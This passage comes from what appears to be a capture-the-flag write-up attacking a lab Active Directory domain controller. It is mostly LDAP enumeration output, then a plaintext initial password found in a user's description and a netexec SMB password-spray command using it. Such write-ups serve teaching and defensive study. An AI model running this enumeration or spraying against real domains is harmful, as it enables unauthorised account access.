LDAP 10.129.20.55 389 BABYDC objectGUID edff1026-8342-a246-bae7-9bcc489d99c3
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-514
LDAP 10.129.20.55 389 BABYDC sAMAccountName Domain Guests
LDAP 10.129.20.55 389 BABYDC sAMAccountType 268435456
LDAP 10.129.20.55 389 BABYDC groupType -2147483646
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC isCriticalSystemObject TRUE
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163013.0Z
LDAP 10.129.20.55 389 BABYDC 20211121145159.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000417.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Domain Users,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC group
LDAP 10.129.20.55 389 BABYDC cn Domain Users
LDAP 10.129.20.55 389 BABYDC description All domain users
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Domain Users,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC uSNCreated 12348
LDAP 10.129.20.55 389 BABYDC memberOf CN=Users,CN=Builtin,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC uSNChanged 12350
LDAP 10.129.20.55 389 BABYDC name Domain Users
LDAP 10.129.20.55 389 BABYDC objectGUID cab4d850-106d-9e4c-91ab-39be011a5b9e
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-513
LDAP 10.129.20.55 389 BABYDC sAMAccountName Domain Users
LDAP 10.129.20.55 389 BABYDC sAMAccountType 268435456
LDAP 10.129.20.55 389 BABYDC groupType -2147483646
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC isCriticalSystemObject TRUE
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163013.0Z
LDAP 10.129.20.55 389 BABYDC 20211121145159.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000417.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC group
LDAP 10.129.20.55 389 BABYDC cn Enterprise Read-only Domain Controllers
LDAP 10.129.20.55 389 BABYDC description Members of this group are Read-Only Domain Controllers in the enterprise
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC uSNCreated 12429
LDAP 10.129.20.55 389 BABYDC uSNChanged 12431
LDAP 10.129.20.55 389 BABYDC name Enterprise Read-only Domain Controllers
LDAP 10.129.20.55 389 BABYDC objectGUID 55d70116-7efd-414e-a40b-510abb86961b
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-498
LDAP 10.129.20.55 389 BABYDC sAMAccountName Enterprise Read-only Domain Controllers
LDAP 10.129.20.55 389 BABYDC sAMAccountType 268435456
LDAP 10.129.20.55 389 BABYDC groupType -2147483640
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC isCriticalSystemObject TRUE
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163013.0Z
LDAP 10.129.20.55 389 BABYDC 20211121145159.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000417.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC group
LDAP 10.129.20.55 389 BABYDC cn Group Policy Creator Owners
LDAP 10.129.20.55 389 BABYDC description Members in this group can modify group policy for the domain
LDAP 10.129.20.55 389 BABYDC member CN=Administrator,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC uSNCreated 12354
LDAP 10.129.20.55 389 BABYDC memberOf CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC uSNChanged 12391
LDAP 10.129.20.55 389 BABYDC name Group Policy Creator Owners
LDAP 10.129.20.55 389 BABYDC objectGUID 5ba8abd0-8d33-214f-afa8-893badb23f09
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-520
LDAP 10.129.20.55 389 BABYDC sAMAccountName Group Policy Creator Owners
LDAP 10.129.20.55 389 BABYDC sAMAccountType 268435456
LDAP 10.129.20.55 389 BABYDC groupType -2147483646
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC isCriticalSystemObject TRUE
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163013.0Z
LDAP 10.129.20.55 389 BABYDC 20211121145159.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000417.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Guest,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC person
LDAP 10.129.20.55 389 BABYDC organizationalPerson
LDAP 10.129.20.55 389 BABYDC user
LDAP 10.129.20.55 389 BABYDC cn Guest
LDAP 10.129.20.55 389 BABYDC description Built-in account for guest access to the computer/domain
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Guest,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121144952.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121144952.0Z
LDAP 10.129.20.55 389 BABYDC uSNCreated 8197
LDAP 10.129.20.55 389 BABYDC memberOf CN=Guests,CN=Builtin,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC uSNChanged 8197
LDAP 10.129.20.55 389 BABYDC name Guest
LDAP 10.129.20.55 389 BABYDC objectGUID f174e124-e6b5-e044-b151-f2192f705df4
LDAP 10.129.20.55 389 BABYDC userAccountControl 66082
LDAP 10.129.20.55 389 BABYDC badPwdCount 0
LDAP 10.129.20.55 389 BABYDC codePage 0
LDAP 10.129.20.55 389 BABYDC countryCode 0
LDAP 10.129.20.55 389 BABYDC badPasswordTime 0
LDAP 10.129.20.55 389 BABYDC lastLogoff 0
LDAP 10.129.20.55 389 BABYDC lastLogon 0
LDAP 10.129.20.55 389 BABYDC pwdLastSet 0
LDAP 10.129.20.55 389 BABYDC primaryGroupID 514
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-501
LDAP 10.129.20.55 389 BABYDC accountExpires 9223372036854775807
LDAP 10.129.20.55 389 BABYDC logonCount 0
LDAP 10.129.20.55 389 BABYDC sAMAccountName Guest
LDAP 10.129.20.55 389 BABYDC sAMAccountType 805306368
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC isCriticalSystemObject TRUE
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163013.0Z
LDAP 10.129.20.55 389 BABYDC 20211121145159.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000417.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Hugh George,OU=dev,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC person
LDAP 10.129.20.55 389 BABYDC organizationalPerson
LDAP 10.129.20.55 389 BABYDC user
LDAP 10.129.20.55 389 BABYDC cn Hugh George
LDAP 10.129.20.55 389 BABYDC sn George
LDAP 10.129.20.55 389 BABYDC givenName Hugh
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Hugh George,OU=dev,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121151103.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121151103.0Z
LDAP 10.129.20.55 389 BABYDC displayName Hugh George
LDAP 10.129.20.55 389 BABYDC uSNCreated 12813
LDAP 10.129.20.55 389 BABYDC memberOf CN=dev,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC uSNChanged 12818
LDAP 10.129.20.55 389 BABYDC name Hugh George
LDAP 10.129.20.55 389 BABYDC objectGUID 93396f22-e9ba-784a-a884-7ab7070ad8a0
LDAP 10.129.20.55 389 BABYDC userAccountControl 66080
LDAP 10.129.20.55 389 BABYDC badPwdCount 0
LDAP 10.129.20.55 389 BABYDC codePage 0
LDAP 10.129.20.55 389 BABYDC countryCode 0
LDAP 10.129.20.55 389 BABYDC badPasswordTime 0
LDAP 10.129.20.55 389 BABYDC lastLogoff 0
LDAP 10.129.20.55 389 BABYDC lastLogon 0
LDAP 10.129.20.55 389 BABYDC pwdLastSet 132819810634363083
LDAP 10.129.20.55 389 BABYDC primaryGroupID 513
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-1106
LDAP 10.129.20.55 389 BABYDC accountExpires 9223372036854775807
LDAP 10.129.20.55 389 BABYDC logonCount 0
LDAP 10.129.20.55 389 BABYDC sAMAccountName Hugh.George
LDAP 10.129.20.55 389 BABYDC sAMAccountType 805306368
LDAP 10.129.20.55 389 BABYDC userPrincipalName Hugh.George@baby.vl
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163014.0Z
LDAP 10.129.20.55 389 BABYDC 20211121162927.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000416.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=it,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC group
LDAP 10.129.20.55 389 BABYDC cn it
LDAP 10.129.20.55 389 BABYDC member CN=Caroline Robinson,OU=it,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC CN=Teresa Bell,OU=it,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC CN=Kerry Wilson,OU=it,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC CN=Joseph Hughes,OU=it,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=it,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121151108.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20240727221156.0Z
LDAP 10.129.20.55 389 BABYDC displayName it
LDAP 10.129.20.55 389 BABYDC uSNCreated 12845
LDAP 10.129.20.55 389 BABYDC memberOf CN=Remote Management Users,CN=Builtin,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC uSNChanged 40986
LDAP 10.129.20.55 389 BABYDC name it
LDAP 10.129.20.55 389 BABYDC objectGUID a9e7a710-6d75-d745-b650-269f8415b27c
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-1109
LDAP 10.129.20.55 389 BABYDC sAMAccountName it
LDAP 10.129.20.55 389 BABYDC sAMAccountType 268435456
LDAP 10.129.20.55 389 BABYDC groupType -2147483646
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163013.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000001.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC person
LDAP 10.129.20.55 389 BABYDC organizationalPerson
LDAP 10.129.20.55 389 BABYDC user
LDAP 10.129.20.55 389 BABYDC cn Jacqueline Barnett
LDAP 10.129.20.55 389 BABYDC sn Barnett
LDAP 10.129.20.55 389 BABYDC givenName Jacqueline
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121151103.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121151103.0Z
LDAP 10.129.20.55 389 BABYDC displayName Jacqueline Barnett
LDAP 10.129.20.55 389 BABYDC uSNCreated 12793
LDAP 10.129.20.55 389 BABYDC memberOf CN=dev,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC uSNChanged 12798
LDAP 10.129.20.55 389 BABYDC name Jacqueline Barnett
LDAP 10.129.20.55 389 BABYDC objectGUID fcb9bd7a-e707-2244-bd1a-bfa9c06aef1c
LDAP 10.129.20.55 389 BABYDC userAccountControl 66080
LDAP 10.129.20.55 389 BABYDC badPwdCount 0
LDAP 10.129.20.55 389 BABYDC codePage 0
LDAP 10.129.20.55 389 BABYDC countryCode 0
LDAP 10.129.20.55 389 BABYDC badPasswordTime 0
LDAP 10.129.20.55 389 BABYDC lastLogoff 0
LDAP 10.129.20.55 389 BABYDC lastLogon 0
LDAP 10.129.20.55 389 BABYDC pwdLastSet 132819810632000928
LDAP 10.129.20.55 389 BABYDC primaryGroupID 513
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-1104
LDAP 10.129.20.55 389 BABYDC accountExpires 9223372036854775807
LDAP 10.129.20.55 389 BABYDC logonCount 0
LDAP 10.129.20.55 389 BABYDC sAMAccountName Jacqueline.Barnett
LDAP 10.129.20.55 389 BABYDC sAMAccountType 805306368
LDAP 10.129.20.55 389 BABYDC userPrincipalName Jacqueline.Barnett@baby.vl
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163014.0Z
LDAP 10.129.20.55 389 BABYDC 20211121162927.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000416.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC person
LDAP 10.129.20.55 389 BABYDC organizationalPerson
LDAP 10.129.20.55 389 BABYDC user
LDAP 10.129.20.55 389 BABYDC cn Joseph Hughes
LDAP 10.129.20.55 389 BABYDC sn Hughes
LDAP 10.129.20.55 389 BABYDC givenName Joseph
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Joseph Hughes,OU=it,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121151108.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121151108.0Z
LDAP 10.129.20.55 389 BABYDC displayName Joseph Hughes
LDAP 10.129.20.55 389 BABYDC uSNCreated 12869
LDAP 10.129.20.55 389 BABYDC memberOf CN=it,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC uSNChanged 12874
LDAP 10.129.20.55 389 BABYDC name Joseph Hughes
LDAP 10.129.20.55 389 BABYDC objectGUID ae8d0e42-e958-d54f-8466-63528f5e5707
LDAP 10.129.20.55 389 BABYDC userAccountControl 66080
LDAP 10.129.20.55 389 BABYDC badPwdCount 0
LDAP 10.129.20.55 389 BABYDC codePage 0
LDAP 10.129.20.55 389 BABYDC countryCode 0
LDAP 10.129.20.55 389 BABYDC badPasswordTime 0
LDAP 10.129.20.55 389 BABYDC lastLogoff 0
LDAP 10.129.20.55 389 BABYDC lastLogon 0
LDAP 10.129.20.55 389 BABYDC pwdLastSet 132819810685992446
LDAP 10.129.20.55 389 BABYDC primaryGroupID 513
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-1112
LDAP 10.129.20.55 389 BABYDC accountExpires 9223372036854775807
LDAP 10.129.20.55 389 BABYDC logonCount 0
LDAP 10.129.20.55 389 BABYDC sAMAccountName Joseph.Hughes
LDAP 10.129.20.55 389 BABYDC sAMAccountType 805306368
LDAP 10.129.20.55 389 BABYDC userPrincipalName Joseph.Hughes@baby.vl
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163014.0Z
LDAP 10.129.20.55 389 BABYDC 20211121162927.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000416.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC person
LDAP 10.129.20.55 389 BABYDC organizationalPerson
LDAP 10.129.20.55 389 BABYDC user
LDAP 10.129.20.55 389 BABYDC cn Kerry Wilson
LDAP 10.129.20.55 389 BABYDC sn Wilson
LDAP 10.129.20.55 389 BABYDC givenName Kerry
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Kerry Wilson,OU=it,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121151108.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121151108.0Z
LDAP 10.129.20.55 389 BABYDC displayName Kerry Wilson
LDAP 10.129.20.55 389 BABYDC uSNCreated 12879
LDAP 10.129.20.55 389 BABYDC memberOf CN=it,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC uSNChanged 12884
LDAP 10.129.20.55 389 BABYDC name Kerry Wilson
LDAP 10.129.20.55 389 BABYDC objectGUID bd9dcde3-88f2-6a49-970a-572102271b6e
LDAP 10.129.20.55 389 BABYDC userAccountControl 66080
LDAP 10.129.20.55 389 BABYDC badPwdCount 0
LDAP 10.129.20.55 389 BABYDC codePage 0
LDAP 10.129.20.55 389 BABYDC countryCode 0
LDAP 10.129.20.55 389 BABYDC badPasswordTime 0
LDAP 10.129.20.55 389 BABYDC lastLogoff 0
LDAP 10.129.20.55 389 BABYDC lastLogon 0
LDAP 10.129.20.55 389 BABYDC pwdLastSet 132819810686929995
LDAP 10.129.20.55 389 BABYDC primaryGroupID 513
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-1113
LDAP 10.129.20.55 389 BABYDC accountExpires 9223372036854775807
LDAP 10.129.20.55 389 BABYDC logonCount 0
LDAP 10.129.20.55 389 BABYDC sAMAccountName Kerry.Wilson
LDAP 10.129.20.55 389 BABYDC sAMAccountType 805306368
LDAP 10.129.20.55 389 BABYDC userPrincipalName Kerry.Wilson@baby.vl
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163014.0Z
LDAP 10.129.20.55 389 BABYDC 20211121162927.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000416.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC person
LDAP 10.129.20.55 389 BABYDC organizationalPerson
LDAP 10.129.20.55 389 BABYDC user
LDAP 10.129.20.55 389 BABYDC cn Leonard Dyer
LDAP 10.129.20.55 389 BABYDC sn Dyer
LDAP 10.129.20.55 389 BABYDC givenName Leonard
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121151103.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121151103.0Z
LDAP 10.129.20.55 389 BABYDC displayName Leonard Dyer
LDAP 10.129.20.55 389 BABYDC uSNCreated 12823
LDAP 10.129.20.55 389 BABYDC memberOf CN=dev,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC uSNChanged 12828
LDAP 10.129.20.55 389 BABYDC name Leonard Dyer
LDAP 10.129.20.55 389 BABYDC objectGUID 5643109e-43e0-c341-8090-30a2abd2ce84
LDAP 10.129.20.55 389 BABYDC userAccountControl 66080
LDAP 10.129.20.55 389 BABYDC badPwdCount 0
LDAP 10.129.20.55 389 BABYDC codePage 0
LDAP 10.129.20.55 389 BABYDC countryCode 0
LDAP 10.129.20.55 389 BABYDC badPasswordTime 0
LDAP 10.129.20.55 389 BABYDC lastLogoff 0
LDAP 10.129.20.55 389 BABYDC lastLogon 0
LDAP 10.129.20.55 389 BABYDC pwdLastSet 132819810635678033
LDAP 10.129.20.55 389 BABYDC primaryGroupID 513
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-1107
LDAP 10.129.20.55 389 BABYDC accountExpires 9223372036854775807
LDAP 10.129.20.55 389 BABYDC logonCount 0
LDAP 10.129.20.55 389 BABYDC sAMAccountName Leonard.Dyer
LDAP 10.129.20.55 389 BABYDC sAMAccountType 805306368
LDAP 10.129.20.55 389 BABYDC userPrincipalName Leonard.Dyer@baby.vl
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163014.0Z
LDAP 10.129.20.55 389 BABYDC 20211121162927.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000416.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Protected Users,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC group
LDAP 10.129.20.55 389 BABYDC cn Protected Users
LDAP 10.129.20.55 389 BABYDC description Members of this group are afforded additional protections against authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=298939 for more information.
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Protected Users,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC uSNCreated 12445
LDAP 10.129.20.55 389 BABYDC uSNChanged 12447
LDAP 10.129.20.55 389 BABYDC name Protected Users
LDAP 10.129.20.55 389 BABYDC objectGUID 1f4ffce3-829d-984c-9ffb-7ada56bab0eb
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-525
LDAP 10.129.20.55 389 BABYDC sAMAccountName Protected Users
LDAP 10.129.20.55 389 BABYDC sAMAccountType 268435456
LDAP 10.129.20.55 389 BABYDC groupType -2147483646
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC isCriticalSystemObject TRUE
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163013.0Z
LDAP 10.129.20.55 389 BABYDC 20211121145159.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000417.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC group
LDAP 10.129.20.55 389 BABYDC cn RAS and IAS Servers
LDAP 10.129.20.55 389 BABYDC description Servers in this group can access remote access properties of users
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC uSNCreated 12357
LDAP 10.129.20.55 389 BABYDC uSNChanged 12359
LDAP 10.129.20.55 389 BABYDC name RAS and IAS Servers
LDAP 10.129.20.55 389 BABYDC objectGUID c0171285-e1b6-3f4b-a24b-14cc04d04547
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-553
LDAP 10.129.20.55 389 BABYDC sAMAccountName RAS and IAS Servers
LDAP 10.129.20.55 389 BABYDC sAMAccountType 536870912
LDAP 10.129.20.55 389 BABYDC groupType -2147483644
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC isCriticalSystemObject TRUE
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163013.0Z
LDAP 10.129.20.55 389 BABYDC 20211121145159.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000417.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Teresa Bell,OU=it,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC person
LDAP 10.129.20.55 389 BABYDC organizationalPerson
LDAP 10.129.20.55 389 BABYDC user
LDAP 10.129.20.55 389 BABYDC cn Teresa Bell
LDAP 10.129.20.55 389 BABYDC sn Bell
LDAP 10.129.20.55 389 BABYDC description Set initial password to BabyStart123!
LDAP 10.129.20.55 389 BABYDC givenName Teresa
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Teresa Bell,OU=it,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121151108.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121151437.0Z
LDAP 10.129.20.55 389 BABYDC displayName Teresa Bell
LDAP 10.129.20.55 389 BABYDC uSNCreated 12889
LDAP 10.129.20.55 389 BABYDC memberOf CN=it,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC uSNChanged 12905
LDAP 10.129.20.55 389 BABYDC name Teresa Bell
LDAP 10.129.20.55 389 BABYDC objectGUID 1031975b-8263-804a-bbf8-6bb21c1bb741
LDAP 10.129.20.55 389 BABYDC userAccountControl 66080
LDAP 10.129.20.55 389 BABYDC badPwdCount 0
LDAP 10.129.20.55 389 BABYDC codePage 0
LDAP 10.129.20.55 389 BABYDC countryCode 0
LDAP 10.129.20.55 389 BABYDC badPasswordTime 0
LDAP 10.129.20.55 389 BABYDC lastLogoff 0
LDAP 10.129.20.55 389 BABYDC lastLogon 0
LDAP 10.129.20.55 389 BABYDC pwdLastSet 132819812778759642
LDAP 10.129.20.55 389 BABYDC primaryGroupID 513
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-1114
LDAP 10.129.20.55 389 BABYDC accountExpires 9223372036854775807
LDAP 10.129.20.55 389 BABYDC logonCount 0
LDAP 10.129.20.55 389 BABYDC sAMAccountName Teresa.Bell
LDAP 10.129.20.55 389 BABYDC sAMAccountType 805306368
LDAP 10.129.20.55 389 BABYDC userPrincipalName Teresa.Bell@baby.vl
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163014.0Z
LDAP 10.129.20.55 389 BABYDC 20211121162927.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000416.0Z
LDAP 10.129.20.55 389 BABYDC msDS-SupportedEncryptionTypes 0
There’s a ton here. Teresa.Bell has the comment set with an initial password:
LDAP 10.129.20.55 389 BABYDC description Set initial password to BabyStart123!
Shell as Caroline.Robinson
Password Spray Fail
I’ll make a users list from the LDAP data and try to spray the password at them:
oxdf@hacky$ netexec smb BABYDC.baby.vl -u users -p 'BabyStart123!' --continue-on-success
SMB 10.129.20.55 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.20.55 445 BABYDC [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.20.55 445 BABYDC [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.20.55 445 BABYDC [-] baby.vl\dev:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.20.55 445 BABYDC [-] baby.vl\Guest:BabyStart123! STATUS_LOGON_FAILURE
